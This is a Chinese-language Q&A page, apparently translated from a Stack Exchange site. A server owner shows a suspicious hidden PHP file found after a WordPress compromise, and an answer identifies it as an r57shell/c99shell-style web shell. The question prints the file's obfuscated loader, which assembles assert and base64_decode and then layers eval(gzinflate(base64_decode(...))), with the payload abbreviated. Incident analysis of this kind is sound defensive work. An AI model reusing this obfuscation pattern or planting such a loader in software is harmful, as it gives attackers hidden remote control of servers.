sbu*_*uck 1 security linux hacking
在我们的目录之一中找到了一个我们没有创建的奇怪文件。
它被命名为“.moreinfoege.php.KJt” 在目录中我们还有一个名为moreinfo.php的文件
我们最近遇到了服务器问题(WordPress 黑客、DDoS 攻击),因此我们对其他渗透保持高度警惕。这是一个黑客吗?它可以通过哪些方式进入?
这是它的内容的样子(长的乱码字符串缩写为适合这里):
<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>
代码隐藏了它正在处理assert(base64_decode(从“ZXZ 到 W==”的文本这一事实。
该文本的解码显示了另一个字符串,该字符串正在进行另一次解码和解压缩,以eval(gzinflate(base64_decode("5b3pe...
没有发布完整的代码,我看不到兔子洞的尽头是什么。您可以使用此站点来解码每个步骤:
http://www.webutils.pl/index.php?idx=base64 (注意:文本在蓝色框中。)
此链接应该对第二部分有所帮助:http : //www.tareeinternet.com/scripts/decrypt.php
更新:根据完整文件,这似乎是 r57shell 或 c99shell 的变体。它为您的服务器提供了一个 Web 界面,以执行诸如执行命令行操作和与 SQL 数据交互等操作。
该站点有一个示例:http : //phpsecurity.wordpress.com/2007/11/08/what-does-a-phpshell-look-like/
这个网站有一个也有这个问题的人的博客文章:http : //basus.net/?p=19
| 归档时间: |
|
| 查看次数: |
455 次 |
| 最近记录: |